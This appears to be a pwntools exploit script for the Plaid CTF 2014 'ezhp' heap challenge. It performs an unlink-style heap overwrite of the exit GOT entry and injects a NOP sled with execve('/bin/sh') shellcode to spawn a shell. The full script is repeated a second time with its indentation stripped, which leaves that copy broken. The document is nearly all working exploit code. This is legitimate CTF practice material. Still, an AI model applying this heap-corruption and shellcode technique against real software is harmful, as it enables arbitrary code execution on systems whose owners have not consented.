Tosainu/exploit.py

## exploit.py
#!/usr/bin/env python2

# Plaid CTF 2014: ezhp
# https://github.com/ctfs/write-ups-2014/blob/master/plaid-ctf-2014/ezhp/README.md

from pwn import *


# $ objdump -M intel -j .plt -d ezhp
# ...
# 08048420 <exit@plt>:
#  8048420:	ff 25 10 a0 04 08    	jmp    DWORD PTR ds:0x804a010
#  8048426:	68 20 00 00 00       	push   0x20
#  804842b:	e9 a0 ff ff ff       	jmp    80483d0 <read@plt-0x10>
# ...
addr_exit_got = 0x804a010

shellcode = ''
shellcode += '\x31\xd2'             # xor    edx,edx
shellcode += '\x52'                 # push   edx
shellcode += '\x68\x2f\x2f\x73\x68' # push   0x68732f2f
shellcode += '\x68\x2f\x62\x69\x6e' # push   0x6e69622f
shellcode += '\x89\xe3'             # mov    ebx,esp
shellcode += '\x52'                 # push   edx
shellcode += '\x53'                 # push   ebx
shellcode += '\x89\xe1'             # mov    ecx,esp
shellcode += '\x8d\x42\x0b'         # lea    eax,[edx+0xb]
shellcode += '\xcd\x80'             # int    0x80

r = process('./ezhp')
# r = remote('0.0.0.0', 4000)

# Please enter one of the following:
# 1 to add a note.
# 2 to remove a note.
# 3 to change a note.
# 4 to print a note.
# 5 to quit.
# Please choose an option.

def add_note(n):
    r.recvuntil('choose an option.\n')
    r.sendline('1')
    r.recvuntil('Please give me a size.\n')
    r.sendline(str(n))

def remove_note(i):
    r.recvuntil('choose an option.\n')
    r.sendline('2')
    r.recvuntil('Please give me an id.\n')
    r.sendline(str(i))

def change_note(i, s):
    r.recvuntil('choose an option.\n')
    r.sendline('3')
    r.recvuntil('Please give me an id.\n')
    r.sendline(str(i))
    r.recvuntil('Please give me a size.\n')
    r.sendline(str(len(s)))
    r.recvuntil('Please input your data.\n')
    r.sendline(s)

def print_note(i):
    r.recvuntil('choose an option.\n')
    r.sendline('4')
    r.recvuntil('Please give me an id.\n')
    r.sendline(str(i))
    return r.recvuntil('Please')[:-len('Please')]

def quit():
    r.recvuntil('choose an option.\n')
    r.sendline('100')

# add 1 notes
add_note(8)

# gdb-peda$ x/xw 0x804b060
# 0x804b060:	0x09c55000  <- heap base
# gdb-peda$ x/28xw 0x09c55000
# 0x9c55000:	0x0000000c	0x09c5500c	0x00000000	0x00000019
# 0x9c55010:	0x09c55024	0x09c55000	0x00000000	0x00000000
# 0x9c55020:	0x00000000	0x000003e8	0x00000000	0x09c5500c
# 0x9c55030:	0x00000000	0x00000000	0x00000000	0x00000000
# 0x9c55040:	0x00000000	0x00000000	0x00000000	0x00000000
# 0x9c55050:	0x00000000	0x00000000	0x00000000	0x00000000
# 0x9c55060:	0x00000000	0x00000000	0x00000000	0x00000000

# overwrite 2nd chunk's bk to addr_exit_got - 4
payload = ''
payload += 'A' * 0xc
payload += p32(0x3d0)
payload += p32(0)
payload += p32(addr_exit_got - 4)
change_note(0, payload)

# add 2nd note
add_note(8)

# remove 2nd note
# now, addr_exit_got was overwitten to 3rd chunk's addr
remove_note(1)

# send shellcode
payload = ''
payload += '\x90' * 64
payload += shellcode
change_note(0, payload)

quit()
r.clean()
r.interactive()
	#!/usr/bin/env python2

	# Plaid CTF 2014: ezhp
	# https://github.com/ctfs/write-ups-2014/blob/master/plaid-ctf-2014/ezhp/README.md

	from pwn import *


	# $ objdump -M intel -j .plt -d ezhp
	# ...
	# 08048420 <exit@plt>:
	# 8048420: ff 25 10 a0 04 08 jmp DWORD PTR ds:0x804a010
	# 8048426: 68 20 00 00 00 push 0x20
	# 804842b: e9 a0 ff ff ff jmp 80483d0 <read@plt-0x10>
	# ...
	addr_exit_got = 0x804a010

	shellcode = ''
	shellcode += '\x31\xd2' # xor edx,edx
	shellcode += '\x52' # push edx
	shellcode += '\x68\x2f\x2f\x73\x68' # push 0x68732f2f
	shellcode += '\x68\x2f\x62\x69\x6e' # push 0x6e69622f
	shellcode += '\x89\xe3' # mov ebx,esp
	shellcode += '\x52' # push edx
	shellcode += '\x53' # push ebx
	shellcode += '\x89\xe1' # mov ecx,esp
	shellcode += '\x8d\x42\x0b' # lea eax,[edx+0xb]
	shellcode += '\xcd\x80' # int 0x80

	r = process('./ezhp')
	# r = remote('0.0.0.0', 4000)

	# Please enter one of the following:
	# 1 to add a note.
	# 2 to remove a note.
	# 3 to change a note.
	# 4 to print a note.
	# 5 to quit.
	# Please choose an option.

	def add_note(n):
	r.recvuntil('choose an option.\n')
	r.sendline('1')
	r.recvuntil('Please give me a size.\n')
	r.sendline(str(n))

	def remove_note(i):
	r.recvuntil('choose an option.\n')
	r.sendline('2')
	r.recvuntil('Please give me an id.\n')
	r.sendline(str(i))

	def change_note(i, s):
	r.recvuntil('choose an option.\n')
	r.sendline('3')
	r.recvuntil('Please give me an id.\n')
	r.sendline(str(i))
	r.recvuntil('Please give me a size.\n')
	r.sendline(str(len(s)))
	r.recvuntil('Please input your data.\n')
	r.sendline(s)

	def print_note(i):
	r.recvuntil('choose an option.\n')
	r.sendline('4')
	r.recvuntil('Please give me an id.\n')
	r.sendline(str(i))
	return r.recvuntil('Please')[:-len('Please')]

	def quit():
	r.recvuntil('choose an option.\n')
	r.sendline('100')

	# add 1 notes
	add_note(8)

	# gdb-peda$ x/xw 0x804b060
	# 0x804b060: 0x09c55000 <- heap base
	# gdb-peda$ x/28xw 0x09c55000
	# 0x9c55000: 0x0000000c 0x09c5500c 0x00000000 0x00000019
	# 0x9c55010: 0x09c55024 0x09c55000 0x00000000 0x00000000
	# 0x9c55020: 0x00000000 0x000003e8 0x00000000 0x09c5500c
	# 0x9c55030: 0x00000000 0x00000000 0x00000000 0x00000000
	# 0x9c55040: 0x00000000 0x00000000 0x00000000 0x00000000
	# 0x9c55050: 0x00000000 0x00000000 0x00000000 0x00000000
	# 0x9c55060: 0x00000000 0x00000000 0x00000000 0x00000000

	# overwrite 2nd chunk's bk to addr_exit_got - 4
	payload = ''
	payload += 'A' * 0xc
	payload += p32(0x3d0)
	payload += p32(0)
	payload += p32(addr_exit_got - 4)
	change_note(0, payload)

	# add 2nd note
	add_note(8)

	# remove 2nd note
	# now, addr_exit_got was overwitten to 3rd chunk's addr
	remove_note(1)

	# send shellcode
	payload = ''
	payload += '\x90' * 64
	payload += shellcode
	change_note(0, payload)

	quit()
	r.clean()
	r.interactive()